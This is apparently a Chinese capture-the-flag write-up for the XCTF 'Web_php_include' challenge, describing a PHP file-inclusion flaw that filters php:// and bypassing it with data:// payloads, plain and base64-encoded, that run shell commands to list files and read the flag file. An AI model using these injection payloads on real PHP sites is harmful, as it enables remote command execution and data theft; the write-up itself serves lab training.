攻防世界-WEB-Web_php_include

打开靶机

通过代码审计可以知道,存在文件包含漏洞,并且对伪协议php://进行了过滤。

发现根目录下存在phpinfo

观察phpinfo发现如下:

这两个都为on

所以我们就可以使用data://伪协议

payload如下:

html 复制代码
- ?page=data://text/plain,<?phpsystem("ls")?>- ?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=    #base64编码

访问新连接

上面的payload就可以实现命令执行了

找了半天发现flag在fl4gisisish3r3.php文件中

使用如下payload就可以获取flag了

html 复制代码
?page=data://text/plain,<?phpsystem("cat fl4gisisish3r3.php")?>

使用该命令获取的flag被隐藏了,直接在web界面找不到,可以通过查看网页源代码查看

拿到flag

相关推荐
.浓茶1 分钟前
c++11
开发语言·c++
宇卿.5 分钟前
Java中的while和do...while循环
java·开发语言
等什么君!7 分钟前
JavaScript数据类型
开发语言·前端·javascript
爱敲代码的小杨.14 分钟前
【Python】2. 变量和数据类型
开发语言·python
kuai-25 分钟前
MacOS配置python环境
开发语言·python·macos
lly20240627 分钟前
CSS 尺寸 (Dimension)
开发语言
procoder33828 分钟前
[C/C++开发]链接动态库在不同操作系统上的行为
c语言·开发语言·c++
DK七七28 分钟前
【PHP陪玩系统源码】游戏陪玩系统app,陪玩小程序优势
前端·vue.js·游戏·小程序·php·uniapp
大道归简34 分钟前
2.点位管理开发(续)及设计思路——帝可得后台管理系统
java·开发语言·spring boot·spring·前端框架
L-李俊漩37 分钟前
python配置环境变量
开发语言·python·pip